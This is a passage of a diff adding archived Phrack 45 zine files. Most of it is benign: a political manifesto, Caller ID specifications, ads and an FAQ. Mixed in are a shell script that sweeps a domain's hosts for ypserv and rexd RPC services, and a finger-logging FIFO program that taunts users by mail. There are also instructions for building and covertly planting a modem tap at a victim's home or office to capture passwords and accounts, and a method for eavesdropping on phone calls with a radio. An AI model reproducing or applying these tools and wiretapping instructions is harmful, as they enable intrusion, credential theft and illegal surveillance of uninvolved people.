+tail -`expr $lines  - 7` .file$$  | cut -d" " -f2 > .file.tmp # .file
+sed -e "s/$/.$domainname/"  .file.tmp > .hosts$$
+rm -rf .file* .tmp$$
+sort .hosts$$ | uniq -q >> HOSTS$$; rm -rf .hosts$$
+done
+tr 'A-Z' 'a-z' <HOSTS$$ |sort|uniq -q > HOSTS.$domainname;rm -rf HOSTS$$
+}
+
+# Function
+
+rpc_calls()
+{
+for entry in `cat HOSTS.$domainname`; do
+(
+rpcinfo -t $entry ypserv >/dev/null  && echo $entry runs YPSERV ||  exit 1 # Error!
+) >> .log  2>/dev/null
+(
+rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD ||  exit 1 # Error !
+ ) >> .log  2>/dev/null
+done
+}
+
+# Main
+
+if [ "$domainname" = '' ];  then
+echo "Usage $0 domainname" >&2
+exit 1
+fi
+get_list
+echo "Checking $domainname domain" > .log
+echo "*****************************" >> .log
+echo "Totally `cat HOSTS.$domainname | wc -l` sites  to scan" >> .log
+echo "******************************" >> .log
+echo "started at `date`" >> .log
+echo "******************************" >> .log
+rpc_calls
+echo "******************************" >> .log
+echo "finished at `date`"  >> .log
+
+------------------------------------------------------------------------------
+
+                         The Ultimate Finger/Mail Hack
+
+                                      by
+
+                                    Emanon
+
+                              (a.k.a. WinterHawk)
+
+
+This program will keep a log of who fingers you on your local host and tell
+you when the finger was performed. As an added tease, it will send email to
+the person doing the fingering telling them that you know who they are and
+you know when they fingered you, even when you are not logged on.
+
+Easy to follow steps:
+
+[This is a comment]
+
+[ALL OF THE FOLLOWING FILES ARE TO GO IN YOUR HOME DIRECTORY!!!]
+
+[Get to your home directory]
+% cd
+
+[Make a file called .mailscript and include the following source code]
+[MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!]
+% cat .mailscript
+#!bin/sh
+MYNAME=your_account_name # JUST YOUR LOCAL ACCOUNT NAME, NOT THE FULL ADDRESS!!!
+HOME=/your/full/home/path/goes/here
+SUCKER=`ps -fau | grep 'finger $MYNAME' | grep -v 'grep' | awk '{print $1}'`
+echo "$SUCKER fingered you on `date`" | cat >> $HOME/.fingerlog
+echo "$MYNAME knows that you fingered him on `date`" | mail -s 'Sucker!' $SUCKER
+
+[On some systems, the `u' flag is not necessary for the `ps' command]
+[On most systems, you will not have to (re)declare the $HOME variable]
+[If you do not want the fingerer to receive email, remove the last line]
+[You may wish to hard code your account name, rather than using the variable]
+
+[Make a file called fingerLog.c and include the following source code]
+[MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!]
+% cat fingerLog.c
+#include <stdio.h>
+#include <sys/file.h>
+main()
+{
+   int x, pipeHandle, planHandle;
+   char * pipeFile = "/your/full/home/path/goes/here/.plan";
+   char * planFile = "/your/full/home/path/goes/here/.realplan";
+   char buf[1024];
+   for(;;){
+      pipeHandle=open(pipeFile,O_WRONLY);
+      planHandle=open(planFile,O_RDONLY);
+      while((x=read(planHandle,buf,sizeof(buf)))>0)
+         write(pipeHandle,buf,x);
+      system("sh /your/full/home/path/goes/here/.mailscript");
+      close(pipeHandle);
+      close(planHandle);
+      sleep(3);}
+}
+
+[Compile the fingerLog.c program]
+% cc fingerLog.c -o fingerLog
+
+[You may want to use a more inconspicuous name for the executable file]
+
+[Move you .plan file to .realplan]
+% mv .plan .realplan
+
+[Make a piped FIFO .plan file]
+% mknod .plan p
+
+[Allow people to view your bogus .plan file]
+% chmod 755 .plan
+
+[Run fingerLog in the background]
+% nohup fingerLog > /dev/null &
+
+[Optional clean up]
+% rm fingerLog.c
+
+PROBLEMS: On some machines, the [ps -fau] option will not reveal what account
+          a person is actually fingering. In this case, you can remove all
+          instances of the $MYNAME variable from the [.mailscript] file.
+          However, it is entirely possible that two people may be performing a
+          finger at the same time and the script may log the wrong one. If you
+          do have to omit the $MYNAME variable, I strongly suggest that you
+          also remove the email option. And, you might as well change the [ps]
+          command to a simple [w], like so:
+
+          SUCKER=`w | grep 'finger' | grep -v 'grep' | awk '{print $1}'`
+
+          Also, if the system you are on is bogged down with a lot of
+          processes, the script may not find the fingerer before the process
+          is terminated, thus logging the time without an appropriate account
+          name, and not sending the email. So far, there has only been one
+          system where I could only use the program to log the times that I
+          had been fingered, no account names and no email :(
+
+That's It! Of course, this is not a perfect bug free program. It should run
+all the time [even when you are not logged on] so you only need to run it
+once. If it does quit for some reason [like when the sysop kills it], you can
+simply restart it. For those of you privileged enough to be using Korn shell,
+you can add the following code to your [.profile] that will check to see if
+fingerLog is running whenever you log in. If it isn't, it will restart it for
+you. I'm sure that this can be modified to work with Bourne and C shell (if it
+doesn't already), but I'll leave that up to you.
+
+ps x | grep 'fingerLog' | grep -v 'grep' > /dev/null
+if (( $? != 0 )); then nohup fingerLog > /dev/null &
+fi
+
+Let me say this one more time so that there is no confusion, "This only works
+on your LOCAL host!!!" People who finger you from a remote host will see your
+[.realplan] file, just like everyone else, but they will *NOT* receive the
+email. It will appear in your .fingerlog as an empty account name. If and when
+someone does revise this to work with remote hosts (most likely using the
+netstat command), please email me a copy at:
+
+tdavis@garnet.acns.fsu.edu
+
+As a matter of fact, there is a lot of room for improvement. If *ANYONE* makes
+*ANY* revisions, please have the courtesy to email me a copy and explain what
+changes you have made. Thanks. Enjoy!
+
+Assembly: WinterHawk bows humbly to Cat and Fuzz.
+
+------------------------------------------------------------------------------
+
+                     +----------------------+
+                     | Building A Modem Tap |
+                     | by: phigan           |
+                     +----------------------+
+
+        Many of you have probably heard of, seen, or maybe even built a
+phone tap. Not a very difficult device to make. I got the idea of making
+a modem tap from a computer underground book that I saw over at my local
+Spy Headquarters (I'm not sure if this is a store that is only here in
+602 or not but its got shitloads of spy equipment such as video
+surveillance, fake ids, useful literature, fake bombs, very small bugs,
+etc.).  First of all, here is the schematic for making a phone tap to
+record to cassette.
+
+Parts
+~~~~~
+1) RCA-type jack
+   to tape recorder
+   mic input
+1) 10k(p)ohm : 20k(s) ohm
+   transformer
+1) .005 mfd capacitor
+
+Schematic
+~~~~~~~~~
+                                      To line
++--------------------------+          |     |
+|                          |          |     |
+(+-----------+             |          |     |
+RCA          | Transformer |          |     |
+jack         +^^^^^^^^^^^^^+          |     |
+             +-------------+          |     |
+             |             |          |     |
+             |             +----------------+
+             |                        |     |
+             +----------||------------+     |
+                     .005 mfd         |     |
+
+        The main purpose for a modem tap such as this is to set it up at
+someone's house or maybe an office building that you know dials out with
+modems and you can record all the keystrokes that have been entered.
+With this next schematic, you can simply play the cassette back through
+your modem and easily print out the entire session having logged
+passwords and so on. Good way of getting CBI accounts also.
+
+Parts
+~~~~~
+1) RCA type jack
+   from tape recorder
+   ext. speaker
+1) 100 Ohm restistor
+1) bell-type phone jack (@)
+
+Schematic
+~~~~~~~~~
+
+    +-------+       ____________________   RCA jack
+----| Modem | @----<_________/\/\/\_____>(+
+    +-------+ phone          100 Ohm
+              jack
+
+        When you have a recording of your victim's session, simply fire
+up your terminal program and treat it as you would any other modem
+connection. If you are smart enough, you may even be able to combine
+these two and make an acoustic modem module for a regular laptop modem
+(hint hint payphones hint hint). I have seen this done in a mail-order
+mag.
+It said that the acoustic module could handle 9600 baud and if you have
+good
+enough rubber cups (like they did on their model) then you will
+have absolutely no line noise. Anyway, if you have any problems, feel
+free to email me at 15660@ef.gc.maricopa.edu or you may find me on IRC
+as phigan on channels #phreak, #hack, or sometimes #c-64.
+
+
+                      ,,,
+                     (o o)
+.---------------oOO---(_)---OOo---------------.
+| PHiGAN/6o2              IBM/Amiga/8-Bit     |
+| ANSi/VGA/Coding         Member: NWPAC       |
+| Hi-Res/8-Bit/Musix      SysOp:              |
+| 15660@ef.gc.maricopa.edu -The PhAcS Machine |
+`---------------------------------------------'
+
+
+------------------------------------------------------------------------------
+
+                  Phone Tapping with a personal stereo !!!
+                             brought to you by
+
+                                 Harlequin
+
+        Here in the UK, we have a reasonably secure phone system, mainly
+because the whole system is run by our beloved phone company British
+Telecom, even the private phone companies have to rent their lines off BT.
+
+        BUT, due to something or other I don't entirely understand here's
+how to listen in to phone conversations with a personal stereo.
+
+        I was lying in bed one night trying desperately to read my book,
+while everyone else was making enough noise to wake the dead. So, I
+thought, I'll put personal stereo radio onto some radio crackle to cut out
+everything else. I was happily reading for a while when suddenly the radio
+crackle was interrupted by 'ring ring, ring ring, 'ello Jon, going into
+work tomorrow ? Good, how's the wife.... etc etc' Fuck me ! A telephone
+conversation. After a bit of investigating I discovered my bed lies next
+to where the telephone line goes thru the wall.
+
+        What I did was to tune the radio into an AM frequency, as far to
+the right (past 1600 kHz) as possible. This works on my personal stereo, a
+Sharp, model JC-512(GY), my clock radio and my mates pocket radio, but not
+on some other radios we've tried. It picks up local telephone calls (if
+there are any strong enough to be picked up) when the radio is put near a
+telephone socket or line (the closer the better). Computer monitors and
+TV's give loads of interference (try putting your the radio near one when
+tuned to listen for phones) so keep away from them.
+
+        You can't choose what calls to listen in on, and some may be
+blurred beyond recognition, while others are crystal clear. Also,
+strangely enough if someone in the house uses the phone while your
+listening to conversations it doesn't effect it in any way, and you can't
+hear the call currently on the line.
+
+        Not being an electronics hacker I can only assume it is to do with
+the frequency of radio waves given off by electrical devices after a
+certain distance travelled. But then again maybe not.
+
+        This may work in other places apart from the UK as well, give it a
+try !
\ No newline at end of file
diff --git a/phrack45/6.txt b/phrack45/6.txt
new file mode 100644
index 0000000..10f62dd
--- /dev/null
+++ b/phrack45/6.txt
@@ -0,0 +1,1281 @@
+                         ==Phrack Magazine==
+
+              Volume Five, Issue Forty-Five, File 6 of 28
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                                PART III
+
+------------------------------------------------------------------------------
+
+** SUBMISSIONS WANTED ON THE FOLLOWING TOPICS FOR FUTURE ISSUES **
+
+Cable Television Descrambling
+PBX Data Terminal Files
+Van Eck Eavesdroping
+Security & Anti-Security Measures (Computers, Networks, Physical Sites)
+Satellite Transmissions (Audio, Video, DATA, Telecommunications)
+Amateur Radio & Television
+Radio Modification Instructions
+Electronics Project Schematics
+X.25 Networking / X.29 Pad Control
+Digital Cellular (GSM/TDMA/CDMA)
+Wireless Data Networking (LAN, WAN)
+
+** REMEMBER:  Send your university dialups to phrack@well.com ASAP!  **
+
+------------------------------------------------------------------------------
+
+A Declaration of the Complaints and Grievances of the United States
+Electronic Community --
+
+        "They that can give up essential liberty for a little temporary
+safety deserve neither liberty nor safety!" These are Benjamin Franklin's
+words for one of the most important values defining American Government in
+it's infancy. This idea, that people should be given as much freedom as
+possible, and also responsibility for what problems abuse of that freedom
+might bring, is one of the most important differences between our so called
+"Democracy," and a totalitarian despotism. In fact, this value is so
+essential that if it is lost there will be no freedom in the United States
+of America, and no so called "Democracy!" Despite this fact, every day more
+and more of our freedoms, as citizens and residents of the United States of
+America, are being eroded away in the name of safety for us and for our
+government. This erosion of rights and freedoms has touched all areas of
+our lives, from health care and economics, to criminal justice and national
+defense. However, the most profound and dangerous erosion has been in the
+area of technology. We believe this is as good a place as any to begin a
+fight to save our country from continuing to travel down the road to
+despotism. Do not forget that this is only a beginning.
+        We, the people of the Electronic Community in the United States of
+America, have been openly repressed and attacked by all branches and
+divisions of the United States Government, in direct violation of our
+natural rights and rights granted to us via social contract! The Electronic
+Community is one of the world's greatest examples of the power of freedom
+and democracy. Most of Cyberspace was not created by businesses looking for
+profit, or by governments looking for more efficient control, but mainly by
+ordinary citizens looking for a medium through which they could communicate
+with others, and express their thoughts and ideas. The computerized
+telecommunications used by the electronic community is a medium unlike any
+that has ever existed. It is a decentralized, mostly uncensored, and public
+forum for open discussion on a world wide basis. It provides ordinary
+citizens with the ability to express their ideas to anyone willing to
+listen, with no economic or social barriers and no prejudgments. It gives
+everyone in the world access to all the knowledge and information the
+world has to offer. It has continually shattered deeply ingrained social
+prejudices concerning characteristics such as age, race, wealth, and sex.
+In fact, it is common to find 14 year olds arguing philosophy with 41 year
+olds on America's computer networks!
+        However, instead of embracing this great tool of freedom, the
+United States Government has reacted to it with fear and ignorance. They
+have completely ignored the positive effects the existence of this resource
+is already having on society. In fact, they have done little, if anything,
+to even gain an understanding of the electronic community and it's
+citizens. They have thought only of the damage that could be wrought if
+access to this kind of knowledge and information fell into the "wrong
+hands." They have labeled everyone in the electronic community a potential
+criminal, and have cracked down on any kind of activity which has not met
+their standards. In doing so they have crushed the free flow of ideas,
+trampled on the constitution, and blatantly encroached upon the civil rights
+of the people living and working on American's computer networks. They have
+chosen safety above freedom, and in doing so they have threatened the
+existence of one of the most important social developments of the twentieth
+century...
+They have ensued upon a Campaign of Terror, using fear to control and
+        oppress the Electronic Community.
+They have openly and blatantly violated local, state, and federal law, and
+        internationally accepted standards for human rights.
+They have used misinformation to set certain areas of the electronic
+ community off against one another, or to label certain areas as
+ criminal, while they have attacked the entire community without
+ regard to action or position.
+They have lied to the press, to themselves, and to the American people in
+ order to keep their actions unquestioned.
+They have imposed taxes and tariffs and have priced public utilities with
+        the specific intent of effecting a chill upon the free flow of
+        thoughts and ideas.
+They have used technology to amass enormous amounts of information on
+        innocent citizens in order to control and oppress them.
+They have judged the interests of private industry to be more important than
+ the interests of the general population.
+They have attacked innocent citizens in order to increase the profits of
+ certain industries.
+They have declared themselves immune from the legal and moral standards
+ they expect from the rest of society.
+They have, on a regular basis, committed the very acts they have called
+ criminal.
+They have tried to criminalize personal privacy while belligerently
+ defending the privacy of businesses and of government.
+They have attempted to control the minds of the American people by
+ criminalizing certain knowledge and information.
+They have prevented the preparation of thoughts and ideas for public
+        dissemination.
+They have threatened innocent citizens with loss of their right to life,
+        liberty, property, and the pursuit of happiness in order to control
+        their thoughts, opinions, and actions.
+They have repeatedly made laws and taken legal action in areas and/or
+ concerning subjects of which they have little or no understanding.
+They have seized, damaged, and destroyed the property of innocent citizens.
+They have wrongly imprisoned citizens based on questionable information for
+        actions which are negligible and, at worst, legally gray.
+They have directly attacked innocent citizens in order to keep them from
+        publicly assembling.
+They have spied on and attempted to interfere with the private
+        communications of innocent citizens.
+They have made unreasonable and excessive searches and seizures.
+They have punished innocent citizens without trial.
+They have attempted to effect a chill on the free flow of thoughts and
+        ideas.
+They have affected to render the government independent of and superior to
+ the people.
+        We cannot, we WILL not, allow this tyranny to continue! The United
+States Government has ignored the voice of the Electronic Community long
+enough! When we told the government that what they were doing was wrong,
+they refused to listen! When we formed political action groups to bring our
+cases to court and before Congress, we were told that we were using
+loopholes in the law to get away with crime!!! We have, in a peaceful and
+respectful manner, given our government more than reasonable petition for
+redress of our grievances, but if anything the situation has gotten worse!
+Government administrations use computer crime as a weapon in internal
+battles over jurisdiction. Government officials, who have only the
+slightest understanding of computer science, use computer crime as a tool
+for career success. Elected Representatives, who have absolutely no
+understanding of computers, use "information superhighways", computer
+crime, and cryptography to gain constituent money and voter support! The
+Electronic Community, the only group who fully understands the issues
+involved here, and the only group who is effected by the decisions being
+made, has been completely ignored! We have sat around and discussed these
+wrongs long enough! NOW IS THE TIME TO STAND UP AND DEMAND A REDRESS OF OUR
+GRIEVANCES BY ANY AND ALL MEANS AVAILABLE! We must scream the truth so
+loudly that we drown out everything else! We must save our small community
+from destruction so that when the rest of society is ready, the world will
+still have a forum for free speech and open communication. We must demand
+freedom for America's Electronic Community!!!
+
+Tom Cross AKA The White Ninja
+TWN615@Phantom.Com
+
+NOTE: Redistribution and further publishing of this document is highly
+encouraged as long as proper credit is given.
+
+-------------------------
+-------------------------    "Government is not a reason, not an eloquence;
+-------------------------    it is a force. Like fire, it is a dangerous
+--------------- * * * * *    servant and a fearful master."
+--------------- * * * * *
+--------------- * * * * *                        -- George Washington
+--------------- * * * * *
+
+------------------------------------------------------------------------------
+
+  THE JOURNAL OF AMERICAN UNDERGROUND COMPUTING / Published Quarterly
+  ========================================================================
+  ISSN 1074-3111  Technology, Conspiracy, Editorials, Politics, Networking
+  ========================================================================
+
+      Editor-in-Chief:         Scott Davis
+      NetSurfer:               John Logan
+      It's A Conspiracy!:      Gordon Fagan
+
+      E-Mail - editors@fennec.com
+      ** ftp site: etext.archive.umich.edu    /pub/Zines/JAUC
+
+      U.S. Mail:
+      The Journal Of American Underground Computing
+      10111 N. Lamar #25
+      Austin, Texas 78753
+
+  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+
+  To Subscribe to "TJOAUC", send mail to:              sub@fennec.com
+  All questions/comments about this publication to:    comments@fennec.com
+  Send all articles/info that you want published to:   submit@fennec.com
+  Commercial Registration for Profitable Media:        form1@fennec.com
+
+ "The underground press serves as the only effective counter to a growing
+ power, and more sophisticated techniques used by establishment mass media
+ to falsify, misrepresent, misquote, rule out of consideration as a priori
+ ridiculous, or simply ignore and blot out of existence: data, books,
+ discoveries that they consider prejudicial to establishment interest..."
+
+ (William S. Burroughs and Daniel Odier, "The Job", Viking, New York, 1989)
+
+------------------------------------------------------------------------------
+
+   New TimeWasters T-shirts !
+
+Do you know the feeling ? You're behind your terminal for hours,
+browsing the directories of your school's UNIX system. Instead of
+holes, bugs and bad file permissions you find tripwire, TCPwrapper and
+s/key. You run a file with a s-bit and immediately you get a mail from
+the system admin asking what you are doing. In other words, no chance
+to ever become a good hacker there.
+
+Now you have the chance to at least pretend to be an eleet
+hacker. The Dutch hacking fanatics The TimeWasters have released
+the third version of their cool 'hacker' T-shirt. Because
+the previous versions were too limited (20 and 25 shirts) we
+printed no less than 200 shirts this time.
+
+Of course you want to know, what does it look like ?
+On the front, a TimeWasters logo in color. Below that a picture
+of two hacking dudes, hanging behind their equipment, also
+featuring a stack of phracks, pizza boxes, beer, kodez, and
+various computer-related stuff with a 'No WsWietse' sticker.
+On the back, the original TimeWasters logo with the broken
+clock. Below it, four original and dead funny real quotes
+featuring the art of Time Wasting.
+
+Wearing this shirt can only provoke one reaction; WOW !
+Imagine going up to the helpdesk wearing this shirt and
+keeping a straight face while asking a security question !
+
+And for just $2 more you'll get a pair of sunglasses with
+the text 'TimeWasters' on them !
+
+To order:
+Send $20 or $22 to
+ TimeWasters
+ Postbus 402
+ 5611 AK Eindhoven
+ The Netherlands, Europe
+This includes shipping. Please allow some time for delivery. If you
+are in Holland, don't send US$, email the address below for the
+price in guilders and our 'postbank' number.
+
+For more information: email to:
+- timewasters-request@win.tue.nl with subject: T-SHIRT for a txtfile
+  with more info.
+- rob@hacktic.nl or gigawalt@win.tue.nl for questions.
+
+Written by Rob J. Nauta, rob@hacktic.nl dd. 8 mar 1994
+
+------------------------------------------------------------------------------
+
+Caller ID Technical Details
+by Hyperborean Menace
+
+The way Caller ID works internally is through SS7 (Signalling System 7)
+messages between telephone switches equipped to handle SS7.  These messages
+pass all the call information (block/no block, calling number, etc.).
+The calling number is sent as part of the SS7 call setup data on all SS7
+routed calls (i.e. all calls carried between switches that are SS7
+connected).
+
+The calling number is sent between switches always, regardless of
+whether or not *67 (Caller ID Block) is dialed.  It just sends along a
+privacy indicator if you dial *67, and then the final switch in the path
+will send a "P" instead of the calling number to the Caller ID box.
+(But it will still store the actual number - *69 will work whether or
+not the caller dialed *67).  What the final switch along the path does
+with the calling number depends on how the switch is configured.  If you
+are not paying for Caller ID service, the switch is configured so that
+it will not transmit the Caller ID data.
+
+This is entirely separate from Automatic Number Identification, which is sent
+along SS7 where SS7 is available, but can also be sent using other methods,
+so that ALL switches (for many years now) have been able to send ANI (which
+is what Long Distance companies used to know who to bill).  Enhanced 911 is
+NOT based on Caller ID, but on ANI, thus, it will work for anyone, not just
+people connected to SS7 capable switches.  And, of course, *67 will have no
+effect on Enhanced 911 either.
+
+Also interesting is the effect call forwarding has on the various services.
+Say I have my home telephone forwarded to Lunatic Labs, and it has
+Caller ID.  If you call me, the call will forward to Lunatic Labs, and
+its Caller ID box will show YOUR number, not mine (since your line is
+the actual one making the call).
+
+However, ANI is based on the Billing Number (who is paying for the call (or
+would pay if it weren't free), not on who is actually making the call.
+Thus, if I forward my telephone to an 800 Number that gets ANI (such as the
+cable pay-per-view order number), and you call me, they will get MY number
+(since I would be the one paying for that portion of the call, except that
+800 Numbers are free), and you will end up ordering pay-per-view for
+me...
+
+
+CNID (Caller ID) Technical Specifications
+
+
+ PARAMETERS
+ The data signalling interface has the following characteristics:
+        Link Type:           2-wire, simplex
+        Transmission Scheme:    Analog, phase-coherent FSK
+        Logical 1 (mark)        1200 +/- 12 Hz
+        Logical 0 (space)       2200 +/- 22 Hz
+        Transmission Rate:         1200 bps
+        Transmission Level:        13.5 +/- dBm into 900 ohm load
+
+ (I have copied this data as presented.  I believe the
+ transmission level is meant to be -13.5 dBm.)
+
+ [It is indeed -13.5 dBm]
+
+ PROTOCOL
+ The protocol uses 8-bit data words (bytes), each bounded by a
+ start bit and a stop bit.  The CND message uses the Single Data
+ Message format shown below.
+
+ [ I belive this is the same as standard asynchronous serial - I think the
+ start bit is a "space", and the stop bit is a "mark" ]
+
+ Channel  Carrier  Message  Message  Data     Checksum
+ Seizure  Signal   Type     Length   Word(s)  Word
+ Signal            Word     Word
+
+ CHANNEL SEIZURE SIGNAL
+ The channel seizure is 30 continuous bytes of 55h (01010101)
+ providing a detectable alternating function to the CPE (i.e. the
+ modem data pump).
+
+ [CPE = Customer Premises Equipment --i.e. your Caller ID Box]
+
+ CARRIER SIGNAL
+ The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to
+ condition the receiver for data.
+
+ MESSAGE TYPE WORD
+ The message type word indicates the service and capability
+ associated with the data message.  The message type word for CND
+ is 04h (00000100).
+
+ MESSAGE LENGTH WORD
+ The message length word specifies the total number of data words
+ to follow.
+
+ DATA WORDS
+ The data words are encoded in ASCII and represent the following
+ information:
+
+ o  The first two words represent the month
+ o  The next two words represent the day of the month
+ o  The next two words represent the hour in local military time
+ o  The next two words represent the minute after the hour
+ o  The calling party's directory number is represented by the
+        remaining  words in the data word field
+
+ If the calling party's directory number is not available to the
+ terminating central office, the data word field contains an ASCII
+ "O".  If the calling party invokes the privacy capability, the
+ data word field contains an ASCII "P".
+
+ [ Note that 'O' will generally result in the Caller-ID box displaying
+ "Out Of Area" indicating that somewhere along the path the call took from
+ its source to its destination, there was a connection that did not pass
+ the Caller ID data.  Generally, anything out of Southwestern Bell's area
+ will certainly generate a 'O', and some areas in SWB territory might also
+ not have the SS7 connections required for Caller ID]
+
+ CHECKSUM WORD
+ The Checksum Word contains the twos complement of the modulo 256
+ sum of the other words in the data message (i.e., message type,
+ message length, and data words).  The receiving equipment may
+ calculate the modulo 256 sum of the received words and add this
+ sum to the received checksum word.  A result of zero generally
+ indicates that the message was correctly received.  Message
+ retransmission is not supported.
+
+ EXAMPLE CND SINGLE DATA MESSAGE
+ An example of a received CND message, beginning with the message
+ type word, follows:
+
+ 04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51
+
+ 04h=  Calling number delivery information code (message type word)
+ 12h= 18 decimal; Number of data words (date, time, and directory
+        number words)
+ ASCII 30,39= 09; September
+ ASCII 33,30= 30; 30th day
+ ASCII 31,32= 12; 12:00 PM
+ ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM)
+ ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling
+                          party's directory number
+ 51h=  Checksum Word
+
+ [ There is also a Caller Name service that will transmit the number and the
+ name of the caller.  The basic specs are the same as just numbers, but more
+ data is transmitted.  I don't have the details of the data stream for that.]
+
+ DATA ACCESS ARRANGEMENT (DAA) REQUIREMENTS
+ To receive CND information, the modem monitors the phone line
+ between the first and second ring bursts without causing the DAA
+ to go off hook in the conventional sense, which would inhibit the
+ transmission of CND by the local central office.  A simple
+ modification to an existing DAA circuit easily accomplishes the
+ task.
+
+ [i.e. The Caller-ID Device should present a high impedance to the line]
+
+ MODEM REQUIREMENTS
+ Although the data signalling interface parameters match those of
+ a Bell 202 modem, the receiving CPE need not be a Bell 202
+ modem.  A V.23 1200 bps modem receiver may be used to demodulate
+ the Bell 202 signal.  The ring indicate bit (RI) may be used on a
+ modem to indicate when to monitor the phone line for CND
+ information.  After the RI bit sets, indicating the first ring
+ burst, the host waits for the RI bit to reset.  The host then
+ configures the modem to monitor the phone line for CND
+ information.
+
+ According to Bellcore specifications, CND signalling starts as
+ early as 300 mS after the first ring burst and ends at least 475
+ mS before the second ring burst.
+
+
+
+------------------------------------------------------------------------------
+
+Country               Percentage of Piracy
+--------------------------------------------------------
+Australia / New Zealand   45%
+Benelux                   66
+France                    73
+Germany                   62
+Italy                     86
+Japan                     92
+Korea                     82
+Singapore                 41
+Spain                     86
+Sweden                    60
+Taiwan ( 1990 )           93
+Thailand                  99
+United Kingdom            54
+United States             35
+
+     Source: Business Software Alliance, based on 1992 h/w & s/w
+                    shipping figures
+
+------------------------------------------------------------------------------
+
+The Frog Farm Mailing List FAQ v1.1
+January 20th, 1994
+
+
+1. What is this I am reading?
+2. What is the Frog Farm?
+3. Okay, so what's the Frog Farm mailing list?
+4. Are there any rules enforced on the mailing list?
+5. I can see all the addresses of the subscribers!
+6. You must be Nazis. After all, aren't people who hate Jews,
+ blacks, etc., the only people who talk about this sort of thing?
+
+1. What is this I am reading?
+
+This is the FAQ for the Frog Farm mailing list. It is NOT the FAQ
+for the Frog Farm. The FAQ for the Frog Farm is much larger (just
+over 100 Kbytes in size).
+
+
+2. What is the Frog Farm?
+
+Read the FAQ. You can FTP it from etext.archive.umich.edu in the
+/pub/Legal/FrogFarm directory (also accessible via Gopher). If
+you do not have FTP access, you may request the FAQ via e-mail
+from schirado@lab.cc.wmich.edu.
+
+
+3. Okay, so what's the Frog Farm mailing list?
+
+frog-farm@blizzard.lcs.mit.edu is an unmoderated e-mail forum
+devoted to the discussion of claiming, exercising and defending
+Rights in America, past, present and future. Topics include, but
+are not limited to, conflicts which can arise between a free
+people and their public servants when said servants exceed the
+scope of their powers, and possible methods of dealing with such
+conflicts.
+
+To subscribe to the list, send a message containing the single
+line:
+
+  ADD <your-preferred-email-addr>
+
+to frog-farm-request@blizzard.lcs.mit.edu.
+
+To remove your subscription from the forum, send a message
+containing the single line:
+
+  REMOVE <same-email-addr-as-above>
+
+to frog-farm-request@blizzard.lcs.mit.edu.
+
+Note that these commands must be in the BODY of the message; the
+contents of the Subject line are ignored.
+
+While you are subscribed, send mail to
+
+frog-farm@blizzard.lcs.mit.edu
+
+to echo your message to all other list subscribers.
+
+
+4. Are there any rules enforced on the mailing list?
+
+Only two:
+
+1) Do not reveal the e-mail addresses of any subscribers to any
+   individuals who are not subscribers. You may freely
+   redistribute any article posted to the Frog Farm, subject to
+   whatever conditions the poster may have placed on it. For
+   example, some people attach a notice to their message stating
+   that they are NOT allowing the redistribution of their message
+   under ANY circumstances, some people stipulate that it may be
+   redistributed only if it is unaltered in any way, etc.
+
+2) No flaming is permitted. The list maintainers are the sole
+   judges of what constitutes flaming.
+
+
+5. I can see all the addresses of the subscribers!
+
+Under normal circumstances, you can't see the names. If you can,
+you had to work at it; if so, you obviously know what you're
+doing, and you should have known better. Try not to let your
+curiosity overwhelm your respect for the privacy of others.
+
+The security on this list is not as tight as it could be,
+and it is a trivial process for a knowledgeable hacker or hackers
+to circumvent it. If you know how to do this, please don't do it.
+
+
+
+6. You must be Nazis. After all, aren't people who hate Jews,
+ blacks, etc., the only people who talk about this sort of thing?
+
+Not at all. The official position of the Frog Farm is that every
+human being, of any sex or race, has "certain inalienable Rights"
+which may not be violated for any cause or reason. Anyone may
+claim and exercise Rights in America, providing they possess the
+necessary courage and mental competence.
+
+The Frog Farm provides a List of Interesting Organizations to its
+subscribers, which may include organizations or persons who
+believe in a god or gods, or promote the idea that certain races
+are inferior or perhaps part of a conspiratorial plot to enslave
+everyone else. The list maintainers make every effort to note
+such idiotic beliefs, where they exist, and encourage people not
+to throw out the baby with the bathwater, but to seek the truth
+wherever it may be found.
+
+Every individual is unique, and none may be judged by anything
+other than their words and actions.
+
+------------------------------------------------------------------------------
+
+      The LOD Communications Underground H/P BBS Message Base Project:
+
+                   Information/Order File: Brief Version
+                                 2/17/94
+
+
+   This is a short version of the longer, 35K (12 page) Order/Info file. If
+you want the full file, sample message file, detailed tables of contents file,
+etc. you can request it from lodcom@mindvox.phantom.com or choose menu item
+#5 on the Mindvox Gopher Server by using any gopher and opening a connection
+with the hostname: mindvox.
+
+
+The Project:
+------------
+
+   Throughout history, physical objects have been preserved for posterity for
+the benefit of the next generation of humans.  Cyberspace, however, isn't very
+physical; data contained on floppy diskettes has a finite lifetime as does the
+technology to retrieve that data.  The earliest underground hacker bulletin
+board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s
+were state-of-the-art.  Today, it is difficult to find anyone who has one of
+these machines in operating condition, not to mention the brain cells left to
+recall how to operate them. :-(
+
+   LOD Communications has created a historical library of the "dark" portion
+of Cyberspace.  The project's goal is to acquire as much information as
+possible from underground Hack/Phreak (H/P) bulletin boards that were in
+operation during a decade long period, dating from the beginnings (in 1980/81
+with 8BBS and MOM:  Modem Over Manhattan) to the legendary OSUNY, Plover-NET,
+Legion of Doom!, Metal Shop, etc. up through the Phoenix Project circa
+1989/90. Currently, messages from over 75 different BBSes have been retrieved,
+although very few message bases are 100% complete.  However, not having a
+complete "set" does not diminish their value.
+
+  DONATIONS: A portion of every order will be donated to the following causes:
+
+             1) A donation will be made to help pay for Craig Neidorf's
+                (Knight Lightning - Metal Shop Private Co-Sysop) Legal Defense
+                bills (resulting from his successful campaign to protect First
+                Amendment rights for electronic publishing, i.e. the
+                PHRACK/E911 case).
+
+             2) The SotMESC Scholarship Fund.  The SotMESC Scholarship is
+                awarded to students writing exceptional papers of 20 to 30
